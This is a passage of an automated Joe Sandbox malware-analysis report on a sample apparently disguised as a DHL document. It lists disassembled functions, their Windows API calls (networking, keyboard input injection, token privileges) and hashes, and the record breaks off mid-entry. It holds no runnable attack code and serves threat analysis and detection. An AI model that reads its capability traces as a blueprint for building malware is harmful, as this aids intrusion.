                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                    • String ID:
                                                                                    • API String ID: 3880355969-0
                                                                                    • Opcode ID: a802025a3deac725d7d86596b0dbbf89707a76843a3f18a8d4e259fad2e156ab
                                                                                    • Instruction ID: f3aa7b3caec0f7d88c8928ae4d5f56132bdf79b14b97ac559dbac2e534128bb4
                                                                                    • Opcode Fuzzy Hash: a802025a3deac725d7d86596b0dbbf89707a76843a3f18a8d4e259fad2e156ab
                                                                                    • Instruction Fuzzy Hash: 7B513D34A00209EFDB10DF68D884AAE7BB5FF95360F148569F995DB2A0D770ED81CB90
                                                                                    Function 00809A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00809AD2
                                                                                    • __itow.LIBCMT ref: 00809B03
                                                                                      • Part of subcall function 00809D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00809DBE
                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00809B6C
                                                                                    • __itow.LIBCMT ref: 00809BC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 1be80c82ba5e92b968f4748d13fdc2722f5f2f9e775f2d7438386f3ab6636c62
                                                                                    • Instruction ID: 9a12bc16d3b2f874a2bc19dd8dfcded79b5cbc697a1a40fd4ebfa1064d9f794a
                                                                                    • Opcode Fuzzy Hash: 1be80c82ba5e92b968f4748d13fdc2722f5f2f9e775f2d7438386f3ab6636c62
                                                                                    • Instruction Fuzzy Hash: 08419070A00218ABDF15EF54DC5ABFE7FB9EF84724F000069F945A7292DB749A44CBA1
                                                                                    Function 008269AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 008269D1
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 008269E1
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00826A45
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00826A51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                    • String ID:
                                                                                    • API String ID: 2214342067-0
                                                                                    • Opcode ID: 2823df0028d7d92051603e13a0203d447578d3aecdaeffb97e971fd904575f54
                                                                                    • Instruction ID: 46b48ef4b75dd94aff708b131efe3c664893890700b5d60cd76d733e5cf76e25
                                                                                    • Opcode Fuzzy Hash: 2823df0028d7d92051603e13a0203d447578d3aecdaeffb97e971fd904575f54
                                                                                    • Instruction Fuzzy Hash: 0A41A275740210AFEB60AF24DC8AF6A77A8EF45B14F048458FB29AB2D2DA749D408791
                                                                                    Function 0082641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0083F910), ref: 008264A7
                                                                                    • _strlen.LIBCMT ref: 008264D9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _strlen
                                                                                    • String ID:
                                                                                    • API String ID: 4218353326-0
                                                                                    • Opcode ID: 53d71419b81c36e6508710eb29d831d4db2ca6943bfc2705f9950f9291c12206
                                                                                    • Instruction ID: d408c1c2586a90fcb4e58e3d33d94e6eadbc952e230134ac630103cf666fc1e5
                                                                                    • Opcode Fuzzy Hash: 53d71419b81c36e6508710eb29d831d4db2ca6943bfc2705f9950f9291c12206
                                                                                    • Instruction Fuzzy Hash: 83419F71A00118ABCB14EBA8ED89FEEB7B9FF44310F148159F919D7292EB34AD50C751
                                                                                    Function 0081B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0081B89E
                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0081B8C4
                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0081B8E9
                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0081B915
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 3321077145-0
                                                                                    • Opcode ID: 6405f6e06a7596c350149a27c99f038630f4872bf2545835f9891ff9cc7c540a
                                                                                    • Instruction ID: 5a7a3a5312314a17a788944722bb66ecd44f65237dff6ae13bd004ecf2271d24
                                                                                    • Opcode Fuzzy Hash: 6405f6e06a7596c350149a27c99f038630f4872bf2545835f9891ff9cc7c540a
                                                                                    • Instruction Fuzzy Hash: C341F735600610DFCB11EF15C488A99BBB5FF8A710F098098EE5A9B362CB34ED41CB91
                                                                                    Function 00838851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008388DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: InvalidateRect
                                                                                    • String ID:
                                                                                    • API String ID: 634782764-0
                                                                                    • Opcode ID: dea4ea60b30fce3aac6e3a5e080fed3f42017e78a7a9c73a2d1bb6fe20143270
                                                                                    • Instruction ID: 12339afdbf23e6064e2082dad852f8a130eff8d31cb13276e655fe5cd5bd8af5
                                                                                    • Opcode Fuzzy Hash: dea4ea60b30fce3aac6e3a5e080fed3f42017e78a7a9c73a2d1bb6fe20143270
                                                                                    • Instruction Fuzzy Hash: 4131C674600308EFEF209A68CC45FB97BA5FBC5354F644521FE15E61A1CE71E94097D2
                                                                                    Function 0083AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ClientToScreen.USER32(?,?), ref: 0083AB60
                                                                                    • GetWindowRect.USER32(?,?), ref: 0083ABD6
                                                                                    • PtInRect.USER32(?,?,0083C014), ref: 0083ABE6
                                                                                    • MessageBeep.USER32(00000000), ref: 0083AC57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 1352109105-0
                                                                                    • Opcode ID: f6a19cd27f674b64e2fefdd33118a462d0059434d0d587ecb9759bf81f86f742
                                                                                    • Instruction ID: ef8c50c5eeefef8a64dc3818e899b082263e8b0e3d91ff4d1dd657e29f7881a4
                                                                                    • Opcode Fuzzy Hash: f6a19cd27f674b64e2fefdd33118a462d0059434d0d587ecb9759bf81f86f742
                                                                                    • Instruction Fuzzy Hash: 68418030A00119DFCF19DF58C884A59BBF5FF89310F1894A9E598DB265D731E842CBD2
                                                                                    Function 00810AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00810B27
                                                                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 00810B43
                                                                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00810BA9
                                                                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00810BFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
                                                                                    • Instruction ID: 581f9cfcd563acd6e99b5d7f2d5bf6f4c913601c1145497838846ef795561e01
                                                                                    • Opcode Fuzzy Hash: 561601583cfc08415537116d5c641b37baa6e6facf43d8058e82a6519a7c0281
                                                                                    • Instruction Fuzzy Hash: 04312A70D48218AEFB308B658C05BF9BB6DFF45338F04425AE581D11D1C7F449C09B91
                                                                                    Function 00810C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00810C66
                                                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00810C82
                                                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00810CE1
                                                                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00810D33
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                    • String ID:
                                                                                    • API String ID: 432972143-0
                                                                                    • Opcode ID: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
                                                                                    • Instruction ID: d1ee7a18a662e08a40a1ef95a1aca1446b84faca56a273ddec09d405684dbd93
                                                                                    • Opcode Fuzzy Hash: 9def27d258edd527f6597765683be471b0f41c0de5cb0d6c5043b5b3a03e782d
                                                                                    • Instruction Fuzzy Hash: 6C311230900218AEFB308A689C05BFABB6EFF85310F14871AE580D21D1C7B599C58FD2
                                                                                    Function 007E61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007E61FB
                                                                                    • __isleadbyte_l.LIBCMT ref: 007E6229
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E6257
                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007E628D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                    • String ID:
                                                                                    • API String ID: 3058430110-0
                                                                                    • Opcode ID: b2bc9c14ff337106e8417729608b346ac8108b323751499b6c49305007452216
                                                                                    • Instruction ID: 458c112f0853c6bd0a35c6ea3730cbb1ce2285f1a9f099a42a3ce3d8b1ab64a1
                                                                                    • Opcode Fuzzy Hash: b2bc9c14ff337106e8417729608b346ac8108b323751499b6c49305007452216
                                                                                    • Instruction Fuzzy Hash: E631D230605286EFDF228F76CC48BAA7FB9FF59390F154029E96487191E734E950D790
                                                                                    Function 00834EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 00834F02
                                                                                      • Part of subcall function 00813641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0081365B
                                                                                      • Part of subcall function 00813641: GetCurrentThreadId.KERNEL32 ref: 00813662
                                                                                      • Part of subcall function 00813641: AttachThreadInput.USER32(00000000,?,00815005), ref: 00813669
                                                                                    • GetCaretPos.USER32(?), ref: 00834F13
                                                                                    • ClientToScreen.USER32(00000000,?), ref: 00834F4E
                                                                                    • GetForegroundWindow.USER32 ref: 00834F54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                    • String ID:
                                                                                    • API String ID: 2759813231-0
                                                                                    • Opcode ID: 2b763167bf1b496299ce6068ca530eba0fb98d52207943fad0aa4a46b538a280
                                                                                    • Instruction ID: c213198ffc24296c1e3b59de4d34664fa77739531050a9a161d4b3e1c5586122
                                                                                    • Opcode Fuzzy Hash: 2b763167bf1b496299ce6068ca530eba0fb98d52207943fad0aa4a46b538a280
                                                                                    • Instruction Fuzzy Hash: EA310E71D00108AFDB00EFA9C885AEFB7FDEF99300F10446AE515E7251DA75AE458BA1
                                                                                    Function 0083C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • GetCursorPos.USER32(?), ref: 0083C4D2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007EB9AB,?,?,?,?,?), ref: 0083C4E7
                                                                                    • GetCursorPos.USER32(?), ref: 0083C534
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007EB9AB,?,?,?), ref: 0083C56E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 1f6de94910cfc732fbe794b00c10e2f770dcf7668a417a4f29404f06936cb5e9
                                                                                    • Instruction ID: 6236323493997939076749703f3ce45a894a36835605e3a357d7386e68f90da1
                                                                                    • Opcode Fuzzy Hash: 1f6de94910cfc732fbe794b00c10e2f770dcf7668a417a4f29404f06936cb5e9
                                                                                    • Instruction Fuzzy Hash: A231A035601418EFCB25CF58C858EEA7BB5FB89311F044069F90ADB262C731AD90DBE4
                                                                                    Function 00808656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0080810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808121
                                                                                      • Part of subcall function 0080810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0080812B
                                                                                      • Part of subcall function 0080810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080813A
                                                                                      • Part of subcall function 0080810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00808141
                                                                                      • Part of subcall function 0080810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808157
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008086A3
                                                                                    • _memcmp.LIBCMT ref: 008086C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008086FC
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00808703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1592001646-0
                                                                                    • Opcode ID: cacaee83d49316bf7f4efedfcb8f5abbe33d0c7d29f898935ed4e68ece705a1e
                                                                                    • Instruction ID: f624f43459d34681b9700647a268bf1978ca07e142591090606e323c45305a6e
                                                                                    • Opcode Fuzzy Hash: cacaee83d49316bf7f4efedfcb8f5abbe33d0c7d29f898935ed4e68ece705a1e
                                                                                    • Instruction Fuzzy Hash: 2E215A71E00208EBDB50DFA8CD49BAEB7B8FF54304F154059E595A7282DB31AE45CB90
                                                                                    Function 007D098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __setmode.LIBCMT ref: 007D09AE
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00817896,?,?,00000000), ref: 007B5A2C
                                                                                      • Part of subcall function 007B5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00817896,?,?,00000000,?,?), ref: 007B5A50
                                                                                    • _fprintf.LIBCMT ref: 007D09E5
                                                                                    • __setmode.LIBCMT ref: 007D0A1A
                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00805DBB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_fprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2975809307-0
                                                                                    • Opcode ID: bdfadf02f5496fc44df08a30c3e51392f7f787302209040812ad571853fc6b5b
                                                                                    • Instruction ID: 02f0141ad32b96004d5c96ef0092bb4580ad178b9acf5714f01cdf2c46214428
                                                                                    • Opcode Fuzzy Hash: bdfadf02f5496fc44df08a30c3e51392f7f787302209040812ad571853fc6b5b
                                                                                    • Instruction Fuzzy Hash: E211F331904204EFDB04B3B49C4AAFE7B78EF85320F144026F205A7282EE39588257E5
                                                                                    Function 00821767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008217A3
                                                                                      • Part of subcall function 0082182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0082184C
                                                                                      • Part of subcall function 0082182D: InternetCloseHandle.WININET(00000000), ref: 008218E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                                                                                    • Instruction ID: b9515d78aa63f7a11153cb3c0d902efaf5788f0120d96c6f37a8823dfcecff88
                                                                                    • Opcode Fuzzy Hash: 89940f32652ddb6ab234d284182d269d2720a6a8e10b2dd0ebb7939863d0a0ab
                                                                                    • Instruction Fuzzy Hash: 4A210131200615BFEF129F60EC44FBABBA9FF98701F20002AFA01D6250DB319850A7A1
                                                                                    Function 00813A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,0083FAC0), ref: 00813A64
